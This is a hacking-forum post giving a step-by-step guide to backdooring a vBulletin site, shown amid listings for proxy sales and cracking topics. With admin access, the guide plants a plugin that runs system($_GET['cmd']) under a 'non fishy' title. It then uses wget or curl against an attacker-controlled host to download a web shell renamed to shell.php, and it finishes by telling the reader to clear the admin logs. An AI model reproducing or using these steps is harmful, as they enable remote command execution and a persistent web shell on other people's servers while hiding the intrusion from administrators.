Vip-----Munde
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Vip-----Munde

Jai Mata Di
 
HomeLatest imagesRegisterLog in
Welcome Dear Users Please Make Your First Post In Introdcution Section and Enjoy the forum
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» [Vn5socks.net] Auto update 24/7 - Good socks 8h00 PM
Upload Shell on vBulletin EmptySat Dec 01, 2018 7:57 pm by vn5socks.net

» [Shopsocks5.com] Service Socks5 Cheap - 19h40
Upload Shell on vBulletin EmptySat Dec 01, 2018 7:42 pm by shopsocks5.com

» [Vn5socks.net] Auto update 24/7 - Good socks 4h25 PM
Upload Shell on vBulletin EmptySat Dec 01, 2018 4:25 pm by vn5socks.net

» [Shopsocks5.com] Service Socks5 Cheap - 16h10
Upload Shell on vBulletin EmptySat Dec 01, 2018 4:10 pm by shopsocks5.com

» [Vn5socks.net] Auto update 24/7 - Good socks 8h40 AM
Upload Shell on vBulletin EmptySat Dec 01, 2018 8:45 am by vn5socks.net

» [Shopsocks5.com] Service Socks5 Cheap - 8h25
Upload Shell on vBulletin EmptySat Dec 01, 2018 8:25 am by shopsocks5.com

» [DICHVUSOCKS.US] 12h05 AM UPDATE 24/24- Good Socks
Upload Shell on vBulletin EmptySat Dec 01, 2018 12:01 am by dichvusocks

» [DICHVUSOCKS.US] 23h15 PM UPDATE 24/24- Good Socks
Upload Shell on vBulletin EmptyFri Nov 30, 2018 11:35 pm by dichvusocks

» [Vn5socks.net] Auto update 24/7 - Good socks 11h35 PM
Upload Shell on vBulletin EmptyFri Nov 30, 2018 11:34 pm by vn5socks.net

Top posters
vn5socks.net
Upload Shell on vBulletin I_vote_lcapUpload Shell on vBulletin I_voting_barUpload Shell on vBulletin I_vote_rcap 
dichvusocks
Upload Shell on vBulletin I_vote_lcapUpload Shell on vBulletin I_voting_barUpload Shell on vBulletin I_vote_rcap 
shopsocks5.com
Upload Shell on vBulletin I_vote_lcapUpload Shell on vBulletin I_voting_barUpload Shell on vBulletin I_vote_rcap 
tisocks
Upload Shell on vBulletin I_vote_lcapUpload Shell on vBulletin I_voting_barUpload Shell on vBulletin I_vote_rcap 
____H-E-A-R-T____
Upload Shell on vBulletin I_vote_lcapUpload Shell on vBulletin I_voting_barUpload Shell on vBulletin I_vote_rcap 
___devils____
Upload Shell on vBulletin I_vote_lcapUpload Shell on vBulletin I_voting_barUpload Shell on vBulletin I_vote_rcap 
***__яiCh_M@N ™__***
Upload Shell on vBulletin I_vote_lcapUpload Shell on vBulletin I_voting_barUpload Shell on vBulletin I_vote_rcap 
™12.-.@.-.j.-.@™
Upload Shell on vBulletin I_vote_lcapUpload Shell on vBulletin I_voting_barUpload Shell on vBulletin I_vote_rcap 
__Tigeя™__
Upload Shell on vBulletin I_vote_lcapUpload Shell on vBulletin I_voting_barUpload Shell on vBulletin I_vote_rcap 
a-x-n
Upload Shell on vBulletin I_vote_lcapUpload Shell on vBulletin I_voting_barUpload Shell on vBulletin I_vote_rcap 
Most active topics
Jokes In Hindi Funny
[Vn5socks.net] Service Seller Socks Good
Scanned Idz for Cracking
28 August 2011
Hotfile Premium Accounts
26 August 2011
30 August 2011
28 August 2011
29 August 2011
Show Your Cracking Hits
Most Viewed Topics
26 april 2012
23 Aug VIP Http
[Shopsocks5.com] Service Socks5 Cheap - 19h50
PROXIES SOCKS PROXY LIST 20h31 PM BY TISOCKS.NET
PROXIES SOCKS PROXY LIST 20h31 PM BY TISOCKS.NET
14 april 2012
28 april 2012
PROXIES SOCKS PROXY LIST 20h25 PM BY TISOCKS.NET
07 nov.2011
28 August 2011
Top posting users this month
No user

 

 Upload Shell on vBulletin

Go down 
AuthorMessage
__Dj_-k1ll3r__
Super Moderator
Super Moderator
__Dj_-k1ll3r__


Posts : 63
Points : 187
Reputation : 0
Join date : 2011-07-18

Upload Shell on vBulletin Empty
PostSubject: Upload Shell on vBulletin   Upload Shell on vBulletin EmptyMon Jul 25, 2011 11:51 am

Requirements:
- Admin Access

. Log into the admin cp.

2. Under 'Plugins & Products' select Add New Plugin

3. Set the settings as follows:

Product : vBulletin

Hook Location : global_start

Title : (Anything non fishy.. I use 'DEFAULT PLUG')

Execution Order : 5

Plugin PHP Code:


Code:

ob_start();
system($_GET['cmd']);
$execcode = ob_get_contents();
ob_end_clean();

Plugin is Active : Yes

4. After the plugin is added, go to under 'Styles & Templates', select 'Style Manager'

5. Under whatever the default style is, in the drop down menu select Edit Templates.

6. Scroll to ForumHome Templates and expand it. Click on [CUSTOMIZE] next to FORUMHOME.

7. Look for

Code:

$header

somewhere near the top. Replace it with:

Code:

$header
$execcode

8. Go to the main forum page... You should see it saying, "Cannot execute blank command" somewhere on the page. If you see "System() has been disabled" or anything like that, then it's a shitty server, forget it.

9. Now go to the forum and add the following after index.php

Code:

?cmd=wget http://www.evilshell.com/shell.txt;mv shell.txt shell.php

So it would look like

Code:

http://www.site.com/pathtoforum/index.php?cmd=wget http://www.(your shell name).com/shell.txt;mv shell.txt shell.php

What this does, is downloads shell.txt, and renames it to shell.php.

Now, the shell should be located in shell.php in the forums directory... If not, then get is disabled on this server, you can try some alternate methods:

Code:

http://www.site.com/pathtoforum/index.php?cmd=curl http://www.(your shell name).com/shell.txt > shell.php

Code:

http://www.site.com/pathtoforum/index.php?cmd=GET http://www.(your shell name).com/shell.txt shell.php

After you have your real shell on there, remove the plugin, and remove the $execcode from the FORUMHOME section of the template.

Don't forget to clear your admin logs

___________________
Back to top Go down
 
Upload Shell on vBulletin
Back to top 
Page 1 of 1
 Similar topics
-
» ++++++HOW TO UPLOAD PHOTOS ON GOOGLE IMAGES ++++

Permissions in this forum:You cannot reply to topics in this forum
Vip-----Munde :: PC Related :: Hackers' Lounge-
Jump to: